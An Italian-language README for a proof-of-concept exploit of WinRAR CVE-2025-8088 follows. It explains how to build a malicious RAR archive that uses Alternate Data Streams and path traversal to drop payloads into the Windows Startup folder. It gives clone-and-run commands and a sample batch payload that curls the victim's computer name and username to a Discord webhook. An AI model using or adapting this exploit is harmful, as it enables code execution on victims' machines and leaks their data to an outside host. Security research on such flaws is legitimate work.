
Sfruttamento della vulnerabilità CVE in Winrar precedente alla versione 7.13 utilizzando multipli flussi ADS su un singolo file (Implementazione PDF personalizzata)
Un exploit proof-of-concept per la vulnerabilità di WinRAR (CVE-2025-8088) che colpisce le versioni 7.12 e inferiori. Questo strumento crea un archivio RAR malevolo che incorpora payload in Alternate Data Streams (ADS) con path traversal, potenzialmente portando all'esecuzione di codice arbitrario.
# Clona il repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Installa le dipendenze
pip install reportlab
# Esegui l'exploit
python CVE-2025-8088.py
Modifica il payload per chiamare un webhook di Discord:
# Sostituisci la variabile PAYLOAD nello script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Estratto su %COMPUTERNAME% da %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Sostituisci YOUR_DISCORD_WEBHOOK_URL con l'URL del tuo webhook effettivo.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\